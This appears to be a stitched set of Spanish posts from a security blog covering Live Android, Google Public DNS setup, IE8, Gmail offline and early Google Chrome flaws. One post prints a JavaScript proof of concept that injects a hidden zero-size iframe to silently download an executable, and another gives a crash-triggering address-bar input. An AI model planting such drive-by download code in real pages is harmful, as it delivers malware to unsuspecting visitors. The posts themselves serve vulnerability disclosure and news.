Android es un sistema operativo para dispositivos móviles y computadoras basado en el núcleo Linux. Inicialmente fue desarrollado por Google y luego por la Open Handset Alliance (liderada por la propia Google) y es el sistema base de dispositivos móviles como el HTC Dream, HTC Magic, HTC Tattoo, HTC Hero, HTC Dragon, Samsung i7500 o Galaxy, Sony Ericsson Xperia X10, LG GT360, LG GW620 Eve, Geeks’Phone ONE, Samsung I7500 HD, Motorola Dext, Motorola DROID, Motorola Sholes, Archos 5 Internet Tablet, Huawei Pulse, Huawei U8230 etc…

Live Android es un proyecto realizado por talentosos desarrolladores, que permite a cualquier persona probar el sistema operativo Android simplemente iniciando desde un CD-Rom y sin tener que instalar nada en el PC, si quieres probar este sistema operativo, ya sea por que vas a comprar un dispositivo que lo traiga incorporado o por simple curiosidad, aquí te dejo una seria de instrucciones que seguramente te serán de ayuda.

• Primero descargamos la ultima versión del proyecto desde la pagina oficial, dependiendo de la opción escogida, necesitaras el HJSplit para unir las partes si descargas los archivos liveandroidv0.3.iso.001 liveandroidv0.3.iso.002 o el uTorrent si lo decides bajar por torrent.
• Una vez tengamos el archivo live liveandroidv0.3.iso lo quemamos en un CD-Rom o lo configuramos como nuestra unidad VMWare o VirtualBox e iniciamos con el.

Aquí encojemos la resolución a la que queremos ver el sistema

esperamos que inicie el sistema

• Cuando tenemos nuestro android totalmente cargado, nos aparecerá un “escritorio” parecido al siguiente:

• En el escritorio podremos acceder a las principales funciones del dispositivo y añadir o eliminar las que queramos, ademas de tener siempre a la mano una barra de búsqueda en Google y en la parte derecha de la pantalla las demás aplicaciones y opciones.

Aplicaciones del Android y Panel de Administración

• Ahora vamos a realizar una de las opciones mas simples y la primera que realiza la mayoría de personas, poner el lenguaje del sistema operativo de su dispositivo en español, para eso nos vamos a “Settings/Locale & text/Select locale/” y encojemos “Spanish“

• Si exploramos un poco nuestro Live Android podremos encontrar cosas bastante interesantes, como:

Un excelente navegador web

Un cliente VNC

Una replica de Super Mario I

Ademas de todo esto, los servicios de Google, como las búsquedas, el correo, los calendarios, totalmente integrados con el sistema, lo demás lo tendrás que explorar personalmente, te dejo un listado con documentación para que aprendas a usar adecuadamente este sistema operativo:

Guía de Usuario Live Android

• LEER PRIMERO
• Imágenes
• Como Utilizar Live Android
• Como Instalar Aplicaciones
• FAQ
• Conexióna Internet

Solo falta que explores a fondo el sistema, para que puedas tener una opción sobre el y con base en esta, tomar la decisión de comprar o no un dispositivo que lo traiga incorporado.

También puede interesarte...

• SystemRescueCD, Recupera tus datos después de un fallo en el sistema
• Backtrack 4 Final
• Pentoo versión final 2009, GNU/Linux para Test de Penetración
• CAINE – Distribución Live CD para Análisis Forense
• Servidor de DNS Publico por parte de Google
• WifiWay 1.0
• Descargar Ashampoo WinOptimizer Gratis
• Descargar Gratis Internet Explorer 8 Final

Antes de pasar a explicar detalladamente este servicio, definamos que es un servidor DNS:

DNS corresponde a las siglas en inglés de “Domain Name System”, es decir, “Sistema de nombres de dominio”. La función de este sistema es organizar e identificar dominios. Básicamente, lo que hace es proporcionar un nombre a una o varias direcciones IP de un dominio. Por ejemplo, el nombre de dominio dragonjar.org puede traducirse por 62.212.66.77 El nombre hace que resulte mucho más fácil recordar la URL y las direcciones de correo electrónico.

Ahora que conocemos lo que es un servidor DNS, hay que saber que la mayoría de IPS cuentan con su propio servidor DNS para que sea utilizado por sus usuarios, pero muchos de los administradores de estos servidores, descuidan este servidor, no lo actualizan constantemente y esto puede causar problemas a los usuarios.

Ejemplos:

• Si decidiera cambiar de servidor la comunidad dragonjar, esta continuaría con la misma url (dragonjar.org), pero su dirección IP cambiaría, los servidores DNS que no actualizan su base de datos constantemente seguirían enviando a los visitantes de nuestra comunidad a la vieja dirección ip, a los que le saldría un mensaje de error, por que la comunidad ya no se encuentra en esta ip, con los OpenDNS o los DNS de Google, no pasaría esto, ya que son servidores que se actualizan constantemente y mantienen su base de datos al día.
• En cuanto a seguridad, seguramente recordaran el fallo en el protocolo DNS del que todos hablaban en julio del año pasado, esta vulnerabilidad permitía, entre otras cosas, la suplantación de identidad en los nombres de dominio, si un servidor DNS es vulnerable, un atacante podría redirigir a todos los usuarios que de ese servidor, que cuando escriban mibanco.com los envié en realidad a phishingdemibanco.com o a un sitio en el que pueda infectarlos con algún malware. Afortunadamente ya existe una solución para este fallo, pero muchos servidores siguen sin aplicarla, si tu DNS es uno de ellos la única forma de estar a salvo mientras le aplican el parche o actualizan el software, es utilizando servidores alternos como Open DNS o este nuevo servicio de Google.

Por estos motivos nacen servicios de DNS públicos que solucionan estos problemas, manteniendo al día sus servidores DNS y actualizando constantemente su base de datos para saber en todo momento que IP pertenece a un nombre de dominio especifico, el actual líder de este mercado es Open DNS que no solo nos ofrece un servidor DNS seguro y rápido, sino que tiene como valor añadido la posibilidad de Filtrar sitios Webs y muchas otras opciones que puedes ver en su pagina oficial.

¿Que Nos Ofrece el Servidor DNS Publico de Google?

Rapidez: según google su nuevo servicio de DNS publico es mucho mas rápido que cualquier otro, resolviendo el nombre de dominio de una pagina en pocos mili segundos, para comprobar esto la gente de manu-j.com ha creado un script en bash que permite medir el tiempo que tarda en resolver un dominio el OpenDNS, Tu ISP y Google, el ganador de estas pruebas es el nuevo servicio de google, se los dejo para que hagan sus propias pruebas

#!/bin/sh
isp=$(dig +noall +stats 2>&1 | awk '$2~/^SERVER:$/{split($3,dnsip,"#");print dnsip[1]}');
m="-------------------------------------------------------------------------------";
s=" ";
h="+${m:0:25}+${m:0:12}+${m:0:12}+${m:0:12}+${m:0:12}+${m:0:12}+";
header=("Domain${s:0:23}" "Your ISP${s:0:10}" "Google${s:0:10}" "4.2.2.2${s:0:10}" "OpenDNS${s:0:10}" "DNS Adv.${s:0:10}");
echo "${h}";
echo "| ${header[0]:0:23} | ${header[1]:0:10} | ${header[2]:0:10} | ${header[3]:0:10} | ${header[4]:0:10} | ${header[5]:0:10} |";
echo "${h}";
for i in "lifehacker.com" "facebook.com" "dragonjar.org" "reddit.com" "tb4.fr" "bbc.co.uk";
do
ii="${i}${s:23}";
echo -ne "| ${ii:0:23} |";
for j in "${isp}" "8.8.8.8" "4.2.2.2" "208.67.222.222" "156.154.70.1";
do
r="${s:10}$(dig +noall +stats +time=9 @${j} ${i} 2>&1 | awk '$2~/^Query$/{print $4" "$5}')";
echo -ne " ${r:${#r}-10} |";
done
echo -ne "\n${h}\n";
done

Seguridad: en el DNS de Google se incorporan varios niveles de seguridad durante las peticiones, y se informa a los usuarios si estan siendo victimas de ‘DNS Poisoning’, tambien intentan bloquear los ataques de Denegacion de Servicio.

¿Qué Información almacenara google sobre mi?

Esta es la parte delicada del servicio, google es el proveedor de publicidad mas grande del mundo, y le interesa bastante tener un perfil detallado de cada usuario para poder ofrecerle publicidad acorde con este perfil, aunque en las políticas de privacidad actuales del sistema dice que solo registrara la ip temporalmente (48 horas) y nunca guardara tus datos personales ni tu correo electrónico, los datos de tu ubicación geográfica si se almacenaran permanentemente, de igual forma las paginas que visitas y otros datos técnicos.

¿para que usara google estos datos?

Para el “mantenimiento de los servidores” y con fines estadísticos y de optimización.

En lo personal no me convence del todo para que se van a utilizar nuestros datos de navegación, aunque google dice que para nada “malo”, pero no hay que olvidar que su negocio es la informacion y si tiene mas, mejor para ellos, seguiré utilizando los OpenDNS, aunque son un poco mas lentos, tienen bastante valor añadido y como dice su propio autor, no se pueden comparar estos 2 servicios.

Si deseas el servicio de Google solo tienes que poner los DNS 8.8.8.8 y 8.8.4.4 en tu conexión de red.

1. inicio
2. panel de control
3. Conexiones de red
4. click derecho en Conexión de área local luego en propiedades
5. doble click en Protocolo Internet (TCP/IP)
6. seleccionar “Usar las siguientes direcciones de servidor DNS”
7. ingresar estos 2 DNS => 8.8.8.8 y 8.8.4.4

¿como se instalan los DNS de Google en GNU/Linux?

Solo tienes que poner los DNS 8.8.8.8 y 8.8.4.4 en tu conexión de red.

Edita el archivo /etc/resolv.conf y coloca los siguientes datos

$ vi /etc/resolv.conf
nameserver 8.8.8.8
nameserver 8.8.4.4

Si te dio curiosidad y deseas utilizar los OpenDNS puedes seguir el mismo tutorial, pero cambiando las IP’s 8.8.8.8 – 8.8.4.4 por 208.67.222.222 y 208.67.220.220

Mas Información:
Pagina Oficial de Google Public DNS
Post del foro que Inspiro este Artículo

También puede interesarte...

• Descargar Gratis Internet Explorer 8 Final
• Hacking de Redes UPnP – Parte III
• Google – Este sitio puede dañar tu equipo
• Hacking de Redes UPnP – Parte II
• Ver, Eliminar, Redactar correo de GMail sin Internet
• Hacking de Redes UPnP – Parte I
• “Crean” un navegador pensando en su seguridad
• Prueba Android en un Live CD

Microsoft ha lanzado la versión final de su navegador estrella que incluye numerosas mejoras que abarcan desde el soporte de estándares web hasta la seguridad informática, nuevas características han sido implementadas y otras mejoradas como el filtro de sitios maliciosos (phishing, spyware, malware, entre otros), se ha agregado un filtro para prevenir ataques XSS de sitios comprometidos, se han “inspirado” en la característica de Google Chrome para navegar de “incognito” (sin almacenar cookies, historial, cache, ni contraseñas) para implementarla con el nombre de InPrivate en Internet Explorer 8.

También  se “inspiraron”  en Mozilla Firefox para su nueva función de restauración automática, en la que si se cierra nuestro navegador de forma inesperada, automáticamente restaura las pestañas que teníamos al abrir de nuevo el IE.
A pesar que tomaron inspiración de varios de los navegadores mas populares no esta de mas decir que el Internet Explorer 8 supera en creces a cualquiera de sus versiones anteriores, instalenlo y notaran la diferencia.

Descargar Gratis Internet Explorer 8 Final

También puede interesarte...

• Actualiza tu equipo con Windows
• “Crean” un navegador pensando en su seguridad
• Licencia Gratis para Kaspersky Internet Security
• Descargar Ashampoo WinOptimizer Gratis
• Descargar Windows 7 Release Candidate 1
• Instalando Varios Sistemas Operativos en un Acer One – Parte I
• Hacking de Redes UPnP – Parte III
• Hacking de Redes UPnP – Parte II

Hace pocos minutos todas las búsquedas que realizaba en Google.com me arrojaba el mensaje “Este sitio puede dañar tu equipo”, en todas las paginas de resultado, al principio pensé en un ataque masivo sobre Internet (que dramático jejeje) pero realicé la búsqueda “google” en google (no se acabo el mundo como muchos dicen) y veo que todos los resultados aparecían igual.

Google ya ha publicado un comunicado en el que explica que el motivo de este fallo fue un error de humano de una de las personas encargadas del sitio StopBadware.org, de donde google saca la información para catalogar como dañino un sitio Web.

Mas Información:
“This site may harm your computer” on every search result?!?!

También puede interesarte...

• Servidor de DNS Publico por parte de Google
• Descargar Gratis Internet Explorer 8 Final
• Ver, Eliminar, Redactar correo de GMail sin Internet
• “Crean” un navegador pensando en su seguridad
• Prueba Android en un Live CD
• Licencia Gratis para Kaspersky Internet Security
• Google Chrome para GNU Linux y Mac OS X
• Curso de Ubuntu

Lo que hace el GoogleGears es descargar nuestros correos cuando estamos online y cuando ya no tenemos conexión, igual podemos revisar, eliminarlos e incluso redactar nuevos emails, cuando volvamos a estar online, los correos creados serán enviados, y todos los cambios que hemos realizado en nuestra cuenta se llevarán a cabo.

Este vídeo explica el funcionamiento de Google Gears en GMail

Para activar esta funcionalidad es necesario que instales el Google Gears, y que configures el idioma de tu Gmail como “English (US)“, luego te metes a “Settings“, “Labs” y activas “Offline“, despues solo tienes que hacer click en la parte superior derecha de tu pantalla, donde dice “Offline” y seguir las instrucciones.

También puedes utilizar Google Gears con Google Reader, Google Calendar, Remember The Milk y más

Mas Información:
Blog Oficial de Gmail

También puede interesarte...

• Hotmail ahora soporta POP3
• Servidor de DNS Publico por parte de Google
• Configuracion segura de GMail
• Descargar Gratis Internet Explorer 8 Final
• Cursos Gratis de Informática en el Sena Virtual
• Google – Este sitio puede dañar tu equipo
• Encripta tus correos de Gmail con FireGPG
• Resetear Password de Root

Google publicó el Manual de Seguridad del navegador para el público en general. El documento des 60 páginas proporciona una amplia comparación de un amplio conjunto de características de seguridad y características de uso común en los navegadores, junto con útiles comentarios y sugerencias de aplicación para los desarrolladores que necesitan confiar en estos mecanismos.

El texto proporciona a los desarrolladores de aplicaciones web, navegadores, y los investigadores de seguridad una guia de referencia a las principales propiedades de seguridad de los navegadores web.  La insuficiente comprensión de estas a menudo mal documentados características es un importante factor que contribuye a la prevalencia de varias clases de vulnerabilidades de seguridad.

Acceder al Manual de Seguridad del Navegador

El manual es nuevo (hace unas 10 horas lo publicaron) pero se espera que sea traducido a diferentes idiomas (de momento solo esta disponible en ingles).

También puede interesarte...

• Descargar Gratis Internet Explorer 8 Final
• Skipfish, el escáner de Google para seguridad de aplicaciones web
• Binging – Footprinting utilizando Bing
• Charla de Seguridad Web Gratuita – Barcelona España
• Secuestro de Frames Inocentes
• Grendel-Scan
• Charla sobre Seguridad Web dictada – Jorge Marin
• Primera solucion virtualizada para seguridad en los navegadores

Este fallo descubierto nerex y publicado en milw0rm.com consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.

<script>
document.write('<iframe src="http://www.dragonjar.org/calc.exe" frameborder="0" width="0" height="0">');
</script>

He subido una prueba de concepto al servidor con la calculadora de windows y  haciendo click aquí obtendrás algo parecido a esto.

El archivo no se ejecuta, pero estoy seguro que con otro nombre e icono mas llamativos muchos lo abrirían solo por “curiosidad”, al parecer Google se ha dado cuenta de la cantidad de errores que tiene su navegador y ha dejado de promocionarlo en su pagina principal actualizado, han vuelto a promocionarlo en la pagina principal de google.

La version afectada con este y los otros fallos de seguridad mencionados anteriormente en el portal es la 0.2.149.27 les recomiendo que no utilicen este navegador al menos hasta que salga una nueva versión con estos problemas solucionados.

Mas Información:
http://milw0rm.com/exploits/6355
Primera Vulnerabilidad en Google Chrome
Nueva Vulnerabilidad en Google Chrome

También puede interesarte...

• Nueva Vulnerabilidad en Google Chrome
• Primera Vulnerabilidad en Google Chrome
• “Crean” un navegador pensando en su seguridad
• Video: Explotando WM Downloader
• Descargar e Instalar Google Chrome OS
• Descargar Gratis Internet Explorer 8 Final
• Como realizar un borrado seguro usando BleachBit
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida

Ayer les comentaba sobre la Primera Vulnerabilidad en Google Chrome, hoy Rishi Narang ha descubierto una nueva vulnerabilidad que permite bloquear TODAS las pestañas de el ya famoso Navegador de Google.

El fallo radica en la librería chrome.dll (versión 0.2.149.27) del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google Chrome ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de “pestañas independientes” de este navegador (ver imagen).

En evilfingers.com se encuentra la Prueba de Concepto para que verifiquen el fallo (Click aquí o simplemente escriban “:%” sin comillas en la barra de direcciones “Omnibox“) y la explicación técnica del fallo, como pueden ver Google Chrome no es perfecto aunque aun es beta (mmm… pero Gmail también es Beta, Google News también lo es… no sabemos cuanto tiempo tarda Google en volver sus productos en versiones “finales”).

Estaremos pendientes de nuevos fallos en este navegador.

Más Información:
Evilfingers
Kriptopolis

También puede interesarte...

• Muy Bonito, Muy de la Casa, MUY INSEGURO
• Primera Vulnerabilidad en Google Chrome
• “Crean” un navegador pensando en su seguridad
• Descargar e Instalar Google Chrome OS
• Descargar Gratis Internet Explorer 8 Final
• Video: Explotando WM Downloader
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Vulnerabilidad 0-day en todas las versiones de Windows

No ha pasado ni 24 horas desde que google anuncio oficialmente su navegador “Google Chrome” y ya ha sido detectada la primera Vulnerabilidad en este.

Google Chrome es  vulnerable a “carpet bombing“, una vulnerabilidad descubierta por el investigador Aviv Raff en el motor web opensource  Webkit (Base del navegador Google Chrome y Safari) que permite descargar automáticamente archivos cuando el usuario navega por una página maliciosa.

Raff ha publicado una prueba de concepto en la que se muestra como los usuarios de Chrome pueden ser engañados y con solo 2 clicks (obtenidos fácilmente con un poco de ingeniería social) descargaran y ejecutaran archivos .JAR sin ninguna advertencia del navegador.

Con este fallo empieza la historia de la seguridad en el Google Chrome, si quieres saber mas sobre este nuevo navegador de google, te recomiendo leer estos completos reviews realizados por arturogoga, puntogeek, genbeta, djar, etc… (toda la blogosfera habla de el, descargalo aquí…)

Mas Informacion:
Pagina Oficial de Google Chrome
Zdnet

También puede interesarte...

• Muy Bonito, Muy de la Casa, MUY INSEGURO
• Nueva Vulnerabilidad en Google Chrome
• “Crean” un navegador pensando en su seguridad
• Descargar e Instalar Google Chrome OS
• Descargar Gratis Internet Explorer 8 Final
• Video: Explotando WM Downloader
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Vulnerabilidad 0-day en todas las versiones de Windows

Gran controversia a levantado la pequeña gimnasta olímpica He Kexin por el hecho de que según su pasaporte y la Fédération Internationale de Gymnastique (FIG) su fecha de nacimiento es Enero 1 de 1992 sin embargo algunas pequeñas investigaciones en Google podrían mostrar algo como Enero 1 de 1994.

La investigación se puede ver en algunos posts del blog de Stryde un consultor informático en defensa de la seguridad de la información.

Según Stryde si hacemos unas pequeñas búsquedas usando buscadores web podemos encontrar las discrepancias de fechas que han levantado está controversia.

Podemos empezar con las siguientes búsquedas en Google:

site:cn 何可欣 filetype:xls 1994  - Esto contiene los dominios de china mas el nombre de ella
y el valor 1994 en archivos de tipo xls (MS Excel)

Si damos click en el resultado disfrutaremos de un notable 404 o Not Found o No existe, de verdad ¿No existe?

Este archivo alojado en el sitio oficial del gobierno chino que contiene la edad real de Kexin extrañamente fue borrado. Lo bueno es que este documento fue Cacheado por Google y podemos ver su contenido si elegimos la opción View in HTML (ver como HTML). Lamentablemente el nombre de ella no aparece.

De todos modos el investigador no para su consulta aquí y trasciende un poco, ahora en vez de Google usa el buscador Baidu usando la misma cadena de búsqueda usada en Google obtenemos…

Esta vez con un poco mas de suerte tenemos dos documentos alojados en el sitio del gobierno chino pero si damos click en el enlace obtenemos de nuevo un 404, ahora el paso siguiente es revisar el cache de Baidu en el primer archivo y segundo archivo podemos buscar entre los nacidos en 1994 si aparece el nombre de Kexin.

Según estos documentos que se podrían considerar oficiales la chica He Kexin nació en 1994. Lo mas extraño del caso es que estos archivos hallan sido borrados.

Ayer el hacker Stryde encontró otro archivo cacheado que también contiene el nombre de Kexin

Ahora solo le queda a nuestros lectores verificar estos pasos de búsqueda para que vean con sus propios ojos estos resultados y puedan sacar sus propias conclusiones. Stryde es muy claro al decir que no esta en contra de He Kexin ni de china, ni le importa si tiene 14 o 16, solo al igual que yo tiene una duda y es porque se puede manipular de esa forma la información sin conciencia alguna.

También puede interesarte...

• GoolagScan – Google Hacking ahora mas fácil
• Google Hacking
• X.25 Conferencia de Seguridad Informática en Mexico
• Creando una antena para redes WIFI
• Clonacion de tarjeta Sim y hacking a telefonos publicos
• Prueba Android en un Live CD
• Servidor de DNS Publico por parte de Google
• 2do Congreso Nacional de Hacking Ético (Bogotá, Colombia)